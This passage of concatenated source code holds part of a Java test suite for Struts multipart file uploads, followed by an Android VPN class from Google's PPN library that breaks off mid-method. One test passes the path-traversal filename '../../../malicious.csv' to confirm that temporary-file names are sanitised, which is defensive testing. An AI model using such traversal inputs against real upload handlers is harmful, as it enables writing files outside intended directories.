"5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // given mockRequest.setContentType(""); // when multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadContentTypeException"); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .isEmpty(); } @Test public void maxSize() throws IOException { // given String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setMaxSize("1"); multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.uploadedFiles) .isEmpty(); assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadSizeException"); } @Test public void maxFilesSize() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.setMaxFileSize("1"); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadByteCountLimitException"); } @Test public void maxFiles() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.US_ASCII)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.setMaxFiles("1"); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.errors) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadFileCountLimitException"); } @Test public void maxStringLength() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + formField("longText", "very long text") + formField("shortText", "short text") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.setMaxStringLength("10"); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.parameter.too.long"); } @Test public void mismatchCharset() throws IOException { // give String content = formFile("file1", "test1.csv", "Ł,Ś,Ż,Ó") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); // when multiPart.setDefaultEncoding(StandardCharsets.ISO_8859_1.name()); multiPart.parse(mockRequest, tempDir); // then assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getFileParameterNames().asIterator()).toIterable() .asInstanceOf(InstanceOfAssertFactories.LIST) .containsOnly("file1"); assertThat(multiPart.getFile("file1")).allSatisfy(file -> { assertThat(file.isFile()) .isTrue(); assertThat(file.getOriginalName()) .isEqualTo("test1.csv"); assertThat(file.getContentType()) .isEqualTo("text/csv"); assertThat(file.getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .exists() .content() .isEqualTo("Ł,Ś,Ż,Ó"); }); } @Test public void normalFields() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4") + formFile("file2", "test2.csv", "5,6,7,8") + formField("longText", "very long text") + formField("shortText", "short text") + formField("multi", "multi1") + formField("multi", "multi2") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.getErrors()) .isEmpty(); assertThat(multiPart.getParameterNames().asIterator()).toIterable() .containsOnly("longText", "shortText", "multi"); assertThat(multiPart.getParameterValues("longText")) .contains("very long text"); assertThat(multiPart.getParameterValues("shortText")) .contains("short text"); assertThat(multiPart.getParameter("longText")) .isEqualTo("very long text"); assertThat(multiPart.getParameter("shortText")) .isEqualTo("short text"); assertThat(multiPart.getParameterValues("multi")) .containsOnly("multi1", "multi2"); assertThat(multiPart.getParameterValues("not-existing")) .isNull(); } @Test public void unableParseRequest() throws IOException { String content = formFile("file1", "test1.csv", "1,2,3,4"); mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); assertThat(JakartaServletDiskFileUpload.isMultipartContent(mockRequest)).isTrue(); multiPart.parse(mockRequest, tempDir); assertThat(multiPart.getErrors()) .map(LocalizedMessage::getTextKey) .containsExactly("struts.messages.upload.error.FileUploadException"); } @Test public void cleanupDoesNotClearErrorsList() throws IOException { // given - create a scenario that generates errors String content = formFile("file1", "test1.csv", "1,2,3,4"); mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); multiPart.setMaxSize("1"); // Very small to trigger error multiPart.parse(mockRequest, tempDir); // Verify errors exist assertThat(multiPart.getErrors()).isNotEmpty(); int originalErrorCount = multiPart.getErrors().size(); // when multiPart.cleanUp(); // then - errors should remain (cleanup doesn't clear errors) assertThat(multiPart.getErrors()).hasSize(originalErrorCount); } @Test public void largeFileUploadHandling() throws IOException { // Test that large files are handled properly StringBuilder largeContent = new StringBuilder(); for (int i = 0; i < 1000; i++) { largeContent.append("line").append(i).append(","); } String content = formFile("largefile", "large.csv", largeContent.toString()) + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // when multiPart.parse(mockRequest, tempDir); // then - should complete without memory issues assertThat(multiPart.getErrors()).isEmpty(); assertThat(multiPart.getFile("largefile")).hasSize(1); // Cleanup should properly handle large files multiPart.cleanUp(); assertThat(multiPart.uploadedFiles).isEmpty(); } @Test public void multipleFileUploadWithMixedContent() throws IOException { // Test mixed content with multiple files and parameters String content = formFile("file1", "test1.csv", "1,2,3,4") + formField("param1", "value1") + formFile("file2", "test2.csv", "5,6,7,8") + formField("param2", "value2") + formFile("file3", "test3.csv", "9,10,11,12") + formField("param3", "value3") + endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // when multiPart.parse(mockRequest, tempDir); // then - verify all content was processed assertThat(multiPart.getErrors()).isEmpty(); assertThat(multiPart.getFile("file1")).hasSize(1); assertThat(multiPart.getFile("file2")).hasSize(1); assertThat(multiPart.getFile("file3")).hasSize(1); assertThat(multiPart.getParameter("param1")).isEqualTo("value1"); assertThat(multiPart.getParameter("param2")).isEqualTo("value2"); assertThat(multiPart.getParameter("param3")).isEqualTo("value3"); // Store file paths for post-cleanup verification List<String> filePaths = new ArrayList<>(); for (UploadedFile file : multiPart.getFile("file1")) { filePaths.add(file.getAbsolutePath()); } for (UploadedFile file : multiPart.getFile("file2")) { filePaths.add(file.getAbsolutePath()); } for (UploadedFile file : multiPart.getFile("file3")) { filePaths.add(file.getAbsolutePath()); } // when - cleanup multiPart.cleanUp(); // then - verify complete cleanup assertThat(multiPart.uploadedFiles).isEmpty(); assertThat(multiPart.parameters).isEmpty(); // Verify files are deleted for (String filePath : filePaths) { assertThat(new File(filePath)).doesNotExist(); } } @Test public void createTemporaryFileGeneratesSecureNames() { // Create a test instance to access the protected method AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create multiple temporary files File tempFile1 = testRequest.createTemporaryFile("test1.csv", testLocation); File tempFile2 = testRequest.createTemporaryFile("test2.csv", testLocation); File tempFile3 = testRequest.createTemporaryFile("../../../malicious.csv", testLocation); // then - verify secure naming assertThat(tempFile1.getName()).startsWith("upload_"); assertThat(tempFile1.getName()).endsWith(".tmp"); assertThat(tempFile2.getName()).startsWith("upload_"); assertThat(tempFile2.getName()).endsWith(".tmp"); assertThat(tempFile3.getName()).startsWith("upload_"); assertThat(tempFile3.getName()).endsWith(".tmp"); // Verify each file has a unique name assertThat(tempFile1.getName()).isNotEqualTo(tempFile2.getName()); assertThat(tempFile2.getName()).isNotEqualTo(tempFile3.getName()); assertThat(tempFile1.getName()).isNotEqualTo(tempFile3.getName()); // Verify all files are in the correct location assertThat(tempFile1.getParent()).isEqualTo(tempDir); assertThat(tempFile2.getParent()).isEqualTo(tempDir); assertThat(tempFile3.getParent()).isEqualTo(tempDir); // Verify malicious filename doesn't affect the location assertThat(tempFile3.getName()).doesNotContain(".."); assertThat(tempFile3.getName()).doesNotContain("/"); assertThat(tempFile3.getName()).doesNotContain("\\"); // Clean up test files tempFile1.delete(); tempFile2.delete(); tempFile3.delete(); } @Test public void createTemporaryFileInSpecificDirectory() throws IOException { // Create a subdirectory for testing Path subDir = Paths.get(tempDir, "subdir"); Files.createDirectories(subDir); AbstractMultiPartRequest testRequest = createMultipartRequest(); // when File tempFile = testRequest.createTemporaryFile("test.csv", subDir); // then - verify file is created in the specified subdirectory assertThat(tempFile.getParent()).isEqualTo(subDir.toString()); assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); // Clean up tempFile.delete(); Files.delete(subDir); } @Test public void createTemporaryFileWithNullFileName() throws IOException { AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create temp file with null filename File tempFile = testRequest.createTemporaryFile(null, testLocation); // then - should still create a valid temporary file assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); assertThat(tempFile.getParent()).isEqualTo(tempDir); // Clean up tempFile.delete(); } @Test public void createTemporaryFileWithEmptyFileName() throws IOException { AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create temp file with empty filename File tempFile = testRequest.createTemporaryFile("", testLocation); // then - should still create a valid temporary file assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); assertThat(tempFile.getParent()).isEqualTo(tempDir); // Clean up tempFile.delete(); } @Test public void createTemporaryFileWithSpecialCharacters() { AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create temp files with various special characters File tempFile1 = testRequest.createTemporaryFile("file with spaces.csv", testLocation); File tempFile2 = testRequest.createTemporaryFile("file@#$%^&*().csv", testLocation); File tempFile3 = testRequest.createTemporaryFile("файл.csv", testLocation); // Cyrillic // then - all should create valid secure temporary files File[] tempFiles = {tempFile1, tempFile2, tempFile3}; for (File tempFile : tempFiles) { assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); assertThat(tempFile.getParent()).isEqualTo(tempDir); // Verify no special characters leak into the actual filename assertThat(tempFile.getName()).matches("upload_[a-zA-Z0-9_]+\\.tmp"); } // All should have unique names assertThat(tempFile1.getName()).isNotEqualTo(tempFile2.getName()); assertThat(tempFile2.getName()).isNotEqualTo(tempFile3.getName()); assertThat(tempFile1.getName()).isNotEqualTo(tempFile3.getName()); // Clean up tempFile1.delete(); tempFile2.delete(); tempFile3.delete(); } @Test public void createTemporaryFileConsistentNaming() { AbstractMultiPartRequest testRequest = createMultipartRequest(); Path testLocation = Paths.get(tempDir); // when - create many temporary files to verify naming consistency List<File> tempFiles = new ArrayList<>(); for (int i = 0; i < 100; i++) { tempFiles.add(testRequest.createTemporaryFile("test" + i + ".csv", testLocation)); } // then - all should follow the same naming pattern for (File tempFile : tempFiles) { assertThat(tempFile.getName()).startsWith("upload_"); assertThat(tempFile.getName()).endsWith(".tmp"); assertThat(tempFile.getParent()).isEqualTo(tempDir); // Verify UUID pattern (without hyphens, replaced with underscores) assertThat(tempFile.getName()).matches("upload_[a-zA-Z0-9_]+\\.tmp"); } // Verify all names are unique List<String> fileNames = tempFiles.stream().map(File::getName).toList(); assertThat(fileNames).doesNotHaveDuplicates(); // Clean up tempFiles.forEach(File::delete); } @Test public void emptyFileUploadsAreRejected() throws IOException { // Test that empty files (0 bytes) are rejected with proper error message String content = endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"emptyfile\"; filename=\"empty.txt\"" + endline + "Content-Type: text/plain" + endline + endline + // No content - this creates a 0-byte file endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // when multiPart.parse(mockRequest, tempDir); // then - should reject empty file and add error assertThat(multiPart.getErrors()) .hasSize(1) .first() .satisfies(error -> { assertThat(error.getTextKey()).isEqualTo("struts.messages.upload.error.IllegalArgumentException"); assertThat(error.getArgs()).containsExactly("empty.txt", "emptyfile"); }); assertThat(multiPart.uploadedFiles).isEmpty(); assertThat(multiPart.getFile("emptyfile")).isEmpty(); } @Test public void mixedEmptyAndValidFilesProcessedCorrectly() throws IOException { // Test that valid files are processed while empty files are rejected String content = endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"emptyfile1\"; filename=\"empty1.txt\"" + endline + "Content-Type: text/plain" + endline + endline + // No content - empty file endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"validfile\"; filename=\"valid.txt\"" + endline + "Content-Type: text/plain" + endline + endline + "some valid content" + endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"emptyfile2\"; filename=\"empty2.txt\"" + endline + "Content-Type: application/octet-stream" + endline + endline + // Another empty file endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // when multiPart.parse(mockRequest, tempDir); // then - should have 2 errors for empty files, 1 valid file processed assertThat(multiPart.getErrors()).hasSize(2); assertThat(multiPart.getErrors().get(0)) .satisfies(error -> { assertThat(error.getTextKey()).isEqualTo("struts.messages.upload.error.IllegalArgumentException"); assertThat(error.getArgs()).containsExactly("empty1.txt", "emptyfile1"); }); assertThat(multiPart.getErrors().get(1)) .satisfies(error -> { assertThat(error.getTextKey()).isEqualTo("struts.messages.upload.error.IllegalArgumentException"); assertThat(error.getArgs()).containsExactly("empty2.txt", "emptyfile2"); }); // Only the valid file should be processed assertThat(multiPart.uploadedFiles).hasSize(1); assertThat(multiPart.getFile("validfile")).hasSize(1); assertThat(multiPart.getFile("emptyfile1")).isEmpty(); assertThat(multiPart.getFile("emptyfile2")).isEmpty(); // Verify valid file content assertThat(multiPart.getFile("validfile")[0].getContent()) .asInstanceOf(InstanceOfAssertFactories.FILE) .content() .isEqualTo("some valid content"); } @Test public void emptyFileTemporaryFileCleanup() throws IOException { // Test that temporary files for empty files are properly cleaned up String content = endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"emptyfile\"; filename=\"empty.txt\"" + endline + "Content-Type: text/plain" + endline + endline + // Empty file endline + "--" + boundary + "--"; mockRequest.setContent(content.getBytes(StandardCharsets.UTF_8)); // Count temp files before processing File[] tempFilesBefore = new File(tempDir).listFiles((dir, name) -> name.startsWith("upload_") && name.endsWith(".tmp")); int countBefore = tempFilesBefore != null ? tempFilesBefore.length : 0; // when multiPart.parse(mockRequest, tempDir); // then - should reject empty file and clean up temp file assertThat(multiPart.getErrors()).hasSize(1); assertThat(multiPart.uploadedFiles).isEmpty(); // Verify that temporary files are cleaned up (may have implementation differences) // Some implementations create temp files first, others don't create any for empty uploads File[] tempFilesAfter = new File(tempDir).listFiles((dir, name) -> name.startsWith("upload_") && name.endsWith(".tmp")); int countAfter = tempFilesAfter != null ? tempFilesAfter.length : 0; // Allow for implementation differences - just ensure no new temp files remain assertThat(countAfter).isLessThanOrEqualTo(countBefore); } protected String formFile(String fieldName, String filename, String content) { return endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"" + fieldName + "\"; filename=\"" + filename + "\"" + endline + "Content-Type: text/csv" + endline + endline + content; } protected String formField(String fieldName, String content) { return endline + "--" + boundary + endline + "Content-Disposition: form-data; name=\"" + fieldName + "\"" + endline + endline + content; } }
google/vpn-libraries
35,800
android/src/main/java/com/google/android/libraries/privacy/ppn/internal/PpnImpl.java
// Copyright 2020 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.android.libraries.privacy.ppn.internal; import static com.google.android.libraries.privacy.ppn.internal.http.HttpFetcher.DNS_CACHE_TIMEOUT; import static com.google.android.libraries.privacy.ppn.internal.http.HttpFetcher.DNS_LOOKUP_TIMEOUT; import android.accounts.Account; import android.app.Notification; import android.content.Context; import android.content.Intent; import android.net.ConnectivityManager; import android.net.LinkProperties; import android.net.Network; import android.net.VpnService; import android.os.Build; import android.os.Handler; import android.os.Looper; import android.util.Log; import androidx.annotation.Nullable; import androidx.annotation.VisibleForTesting; import com.google.android.gms.tasks.Task; import com.google.android.gms.tasks.TaskCompletionSource; import com.google.android.gms.tasks.TaskExecutors; import com.google.android.libraries.privacy.ppn.BypassOptions; import com.google.android.libraries.privacy.ppn.Dns; import com.google.android.libraries.privacy.ppn.IpGeoLevel; import com.google.android.libraries.privacy.ppn.Ppn; import com.google.android.libraries.privacy.ppn.PpnAccountManager; import com.google.android.libraries.privacy.ppn.PpnConnectingStatus; import com.google.android.libraries.privacy.ppn.PpnConnectionStatus; import com.google.android.libraries.privacy.ppn.PpnDisconnectionStatus; import com.google.android.libraries.privacy.ppn.PpnException; import com.google.android.libraries.privacy.ppn.PpnListener; import com.google.android.libraries.privacy.ppn.PpnOptions; import com.google.android.libraries.privacy.ppn.PpnReconnectionStatus; import com.google.android.libraries.privacy.ppn.PpnResumeStatus; import com.google.android.libraries.privacy.ppn.PpnSnoozeStatus; import com.google.android.libraries.privacy.ppn.PpnStatus; import com.google.android.libraries.privacy.ppn.PpnStatus.Code; import com.google.android.libraries.privacy.ppn.PpnTelemetry; import com.google.android.libraries.privacy.ppn.internal.http.CachedDns; import com.google.android.libraries.privacy.ppn.internal.http.HttpFetcher; import com.google.android.libraries.privacy.ppn.internal.service.PpnServiceDebugJson; import com.google.android.libraries.privacy.ppn.internal.service.ProtectedSocketFactoryFactory; import com.google.android.libraries.privacy.ppn.internal.service.VpnBypassDns; import com.google.android.libraries.privacy.ppn.internal.service.VpnManager; import com.google.android.libraries.privacy.ppn.krypton.Krypton; import com.google.android.libraries.privacy.ppn.krypton.KryptonException; import com.google.android.libraries.privacy.ppn.krypton.KryptonFactory; import com.google.android.libraries.privacy.ppn.krypton.KryptonImpl; import com.google.android.libraries.privacy.ppn.krypton.KryptonIpSecHelper; import com.google.android.libraries.privacy.ppn.krypton.KryptonIpSecHelperImpl; import com.google.android.libraries.privacy.ppn.krypton.KryptonListener; import com.google.android.libraries.privacy.ppn.krypton.OAuthTokenProvider; import com.google.android.libraries.privacy.ppn.xenon.PpnNetwork; import com.google.android.libraries.privacy.ppn.xenon.PpnNetworkListener; import com.google.android.libraries.privacy.ppn.xenon.Xenon; import com.google.android.libraries.privacy.ppn.xenon.impl.XenonImpl; import com.google.android.libraries.privacy.ppn.xenon.impl.v2.XenonV2Impl; import com.google.common.util.concurrent.Futures; import com.google.common.util.concurrent.ListenableFuture; import com.google.errorprone.annotations.CanIgnoreReturnValue; import com.google.errorprone.annotations.ResultIgnorabilityUnspecified; import java.time.Duration; import java.util.Collections; import java.util.HashSet; import java.util.Optional; import java.util.Set; import java.util.concurrent.ExecutorService; import java.util.concurrent.TimeoutException; import java.util.concurrent.atomic.AtomicBoolean; import org.json.JSONObject; /** A PPN implementation built on top of GCS. */ public class PpnImpl implements Ppn, KryptonListener, PpnNetworkListener { private static final String TAG = "PpnImpl"; // By default, keep the Krypton stopped status as "unknown" when Krypton is running, since the // default value will only be used if the Service is somehow stopped without the VPN first being // revoked or stopped by Krypton. private static final PpnStatus KRYPTON_STOPPED_STATUS_UNKNOWN = new PpnStatus.Builder(Code.UNKNOWN, "Service was stopped while Krypton was still running.") .build(); private final Context context; /* Executor for any work that PPN needs to do off the UI thread. */ private final ExecutorService backgroundExecutor; private final VpnManager vpnManager; private final HttpFetcher httpFetcher; private final PpnNotificationManager notificationManager; private final PpnAccountManager accountManager; private PpnTelemetryManager telemetry; private final PpnOptions options; @Nullable private PpnListener listener; private final Handler mainHandler = new Handler(Looper.getMainLooper()); @Nullable private Krypton krypton; private final Object kryptonLock = new Object(); private KryptonFactory kryptonFactory; private PpnStatus kryptonStoppedStatus = KRYPTON_STOPPED_STATUS_UNKNOWN; private Xenon xenon; private final VpnMonitor vpnMonitor; // This is lazy-initialized, because it is only created if we are actually using IpSec. @Nullable private KryptonIpSecHelper ipSecHelper; // These settings can be changed while PPN is running. private Set<String> disallowedApplications = Collections.emptySet(); // Tracks whether PPN is fully connected, for managing notification state. private final AtomicBoolean connected = new AtomicBoolean(); private final AccountCache accountCache; @Override public void onKryptonPermanentFailure(PpnStatus status) { Log.w(TAG, "Krypton stopped with status: " + status); connected.set(false); stopKryptonAndService(status); } @Override public void onKryptonCrashed() { Log.e(TAG, "Krypton has crashed."); Log.e(TAG, "Clearing notification before pending crash."); notificationManager.stopService(); } @Override public void onKryptonConnected(ConnectionStatus status) { Log.w(TAG, "Krypton connected."); telemetry.notifyConnected(); if (listener == null) { return; } try { PpnConnectionStatus ppnStatus = PpnConnectionStatus.fromProto(status); // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnConnected(ppnStatus)); } catch (PpnException e) { Log.e(TAG, "Invalid status proto.", e); } connected.set(true); } @Override public void onKryptonConnecting(ConnectingStatus status) { Log.w(TAG, "Krypton connecting..."); PpnConnectingStatus connectingStatus = PpnConnectingStatus.fromProto(status); Log.w(TAG, "Krypton connecting status: " + connectingStatus); if (listener == null) { return; } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnConnecting(connectingStatus)); } @Override public void onKryptonControlPlaneConnected() { Log.w(TAG, "Krypton control plane connected."); } @Override public void onKryptonStatusUpdated(ConnectionStatus status) { Log.w(TAG, "Krypton status updated."); if (listener == null) { return; } if (!connected.get()) { Log.w(TAG, "Ignoring connection status update, because Krypton is disconnected."); return; } try { PpnConnectionStatus ppnStatus = PpnConnectionStatus.fromProto(status); Log.w(TAG, "Krypton status: " + ppnStatus); // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnStatusUpdated(ppnStatus)); } catch (PpnException e) { Log.e(TAG, "Invalid status proto.", e); } } @Override public void onKryptonDisconnected(DisconnectionStatus status) { Log.w(TAG, "Krypton disconnected: " + status.getCode() + ": " + status.getMessage()); telemetry.notifyDisconnected(); connected.set(false); // Normally, this should be a no-op. But it's possible that we're failing to connect because // the network we are using no longer exists, and Android forgot to tell us about it. So, we // give Xenon a chance to double-check that the networks it knows about are still valid. xenon.reevaluateNetworks(); PpnDisconnectionStatus ppnStatus = PpnDisconnectionStatus.fromProto(status); Log.w(TAG, "Krypton disconnection status: " + ppnStatus); if (listener == null) { return; } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnDisconnected(ppnStatus)); } @Override public void onKryptonNetworkFailed(PpnStatus status, NetworkInfo networkInfo) { Log.w(TAG, "Krypton network " + networkInfo.getNetworkId() + " failed: " + status); xenon.deprioritize(networkInfo); } @Override public void onKryptonWaitingToReconnect(ReconnectionStatus status) { Log.w(TAG, "Krypton waiting to reconnect..."); PpnReconnectionStatus reconnectionStatus = PpnReconnectionStatus.fromProto(status); Log.w(TAG, "Krypton reconnection status: " + reconnectionStatus); if (listener == null) { return; } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnWaitingToReconnect(reconnectionStatus)); } @Override public void onKryptonSnoozed(SnoozeStatus status) { Log.w(TAG, "Krypton is snoozed."); Log.w(TAG, "Stopping Xenon for snooze."); try { xenon.stop(); Log.w(TAG, "Stopped Xenon for snooze."); } catch (PpnException e) { Log.e(TAG, "Unable to stop Krypton after PPN is snoozed.", e); } PpnSnoozeStatus snoozeStatus = PpnSnoozeStatus.fromProto(status); Log.w(TAG, "Krypton snooze status: " + snoozeStatus); if (listener == null) { return; } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnSnoozed(snoozeStatus)); } @Override public void onKryptonResumed(ResumeStatus status) { Log.w(TAG, "Krypton is resumed."); PpnResumeStatus resumeStatus = PpnResumeStatus.fromProto(status); Log.w(TAG, "Krypton resume status: " + resumeStatus); if (listener == null) { return; } Log.w(TAG, "Starting Xenon after resuming from snooze."); try { xenon.start(); Log.w(TAG, "Started Xenon after resuming from snooze."); } catch (PpnException e) { Log.e(TAG, "Unable to start Krypton after Ppn has resumed.", e); } // The Krypton listener doesn't guarantee calls are on the main thread, so enforce it for PPN. mainHandler.post(() -> listener.onPpnResumed(resumeStatus)); } @Override public int onKryptonNeedsTunFd(TunFdData tunFdData) throws PpnException { Log.w(TAG, "Krypton requesting TUN fd."); int createTunFdResult = vpnManager.createTunFd(tunFdData); return createTunFdResult; } @Override public int onKryptonNeedsNetworkFd(NetworkInfo network) throws PpnException { Log.w(TAG, "Krypton requesting network fd."); PpnNetwork ppnNetwork = xenon.getNetwork(network.getNetworkId()); if (ppnNetwork == null) { throw new PpnException("Unable to find network with id " + network.getNetworkId()); } return vpnManager.createProtectedDatagramSocket(ppnNetwork); } @Override public int onKryptonNeedsTcpFd(NetworkInfo network) throws PpnException { Log.w(TAG, "Krypton requesting TCP/IP fd."); PpnNetwork ppnNetwork = xenon.getNetwork(network.getNetworkId()); if (ppnNetwork == null) { throw new PpnException("Unable to find network with id " + network.getNetworkId()); } return vpnManager.createProtectedStreamSocket(ppnNetwork); } @Override public void onKryptonNeedsIpSecConfiguration(IpSecTransformParams params) throws PpnException { if (ipSecHelper == null) { ipSecHelper = new KryptonIpSecHelperImpl(context, xenon); } try { ipSecHelper.transformFd( params, this.options.isSocketKeepaliveEnabled(), this::disableKeepalive); } catch (KryptonException e) { throw new PpnException("Unable to configure IpSec.", e); } } private void disableKeepalive() { try { synchronized (kryptonLock) { if (krypton != null) { // TODO: Create a unit test to cover this line. krypton.disableKryptonKeepalive(); } } } catch (KryptonException e) { Log.e(TAG, "Failed to disable the legacy keepalive.", e); } } /** Creates a new instance of the PPN. */ public PpnImpl(Context context, PpnOptions options) { this.context = context.getApplicationContext(); this.options = options; this.backgroundExecutor = options.getBackgroundExecutor(); this.notificationManager = new PpnNotificationManager(); this.telemetry = new PpnTelemetryManager(); this.vpnManager = VpnManager.create(context, options); Dns dns = new VpnBypassDns(vpnManager); if (options.isDnsCacheEnabled()) { dns = new CachedDns(dns, DNS_CACHE_TIMEOUT, DNS_LOOKUP_TIMEOUT, backgroundExecutor); } this.httpFetcher = new HttpFetcher(new ProtectedSocketFactoryFactory(vpnManager), dns); final OAuthTokenProvider oAuthTokenProvider; if (options.isIntegrityAttestationEnabled()) { final AttestationHelper attestationHelper = new AttestationHelper(context, options); oAuthTokenProvider = new OAuthTokenProvider() { @Override public String getOAuthToken() { try { return getZincOAuthToken(); } catch (PpnException e) { Log.e(TAG, "Unable to get Zinc OAuth token.", e); } return ""; } @Override @Nullable public byte[] getAttestationData(String nonce) { return attestationHelper.getAttestationData(nonce, vpnManager.getNetwork()); } @Override public void clearOAuthToken(String token) { clearZincOAuthToken(token); } }; } else { oAuthTokenProvider = new OAuthTokenProvider() { @Override public String getOAuthToken() { try { return getZincOAuthToken(); } catch (PpnException e) { Log.e(TAG, "Unable to get Zinc OAuth Token.", e); } return ""; } @Override @Nullable public byte[] getAttestationData(String nonce) { return null; } @Override public void clearOAuthToken(String token) { clearZincOAuthToken(token); } }; } this.kryptonFactory = (KryptonListener kryptonListener, ExecutorService bgExecutor) -> new KryptonImpl(context, httpFetcher, oAuthTokenProvider, kryptonListener, bgExecutor); this.accountManager = options.getAccountManager().orElseGet(GoogleAccountManager::new); this.accountCache = new AccountCache(context, backgroundExecutor, accountManager); if (options.isXenonV2Enabled()) { this.xenon = new XenonV2Impl(context, this, httpFetcher, options); } else { this.xenon = new XenonImpl(context, this, httpFetcher, options); } ConnectivityManager connectivityManager = (ConnectivityManager) context.getSystemService(Context.CONNECTIVITY_SERVICE); this.vpnMonitor = new VpnMonitor(connectivityManager); this.disallowedApplications = options.getDisallowedApplications(); PpnLibrary.init(this); } /** Nullifies the cached account used for enabling PPN. */ @VisibleForTesting void clearCachedAccount() { accountCache.clearCachedAccount(); } @Override public void start(Account account) { Log.w(TAG, "PPN status: " + getDebugJson()); accountCache.setAccount(account); // Snapshot the disallowed applications, so that it only changes when PPN is restarted. vpnManager.setDisallowedApplications(disallowedApplications); startVpn(); } @Override public void setAccount(Account account) { Log.w(TAG, "Setting account on PPN."); accountCache.setAccount(account); } @Override public void stop() { // Stopping Krypton requires getting the Krypton lock and waiting for Krypton's threads to be // joined, so we kick it off to the background Executor. backgroundExecutor.execute(() -> stopKryptonAndService(PpnStatus.STATUS_OK)); } @Override public ListenableFuture<Void> restart() { Log.w(TAG, "Restarting Ppn."); return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { stopKrypton(); vpnManager.setDisallowedApplications(disallowedApplications); startKrypton(); } } } catch (PpnException e) { Log.e(TAG, "Failed to restart Ppn.", e); throw e; } return null; }, backgroundExecutor); } @Override public ListenableFuture<Void> snooze(Duration snoozeDuration) { return Futures.submit( () -> { try { synchronized (kryptonLock) { if (krypton != null) { Log.i(TAG, "Snoozing krypton connection for " + snoozeDuration.toMillis() + " ms."); 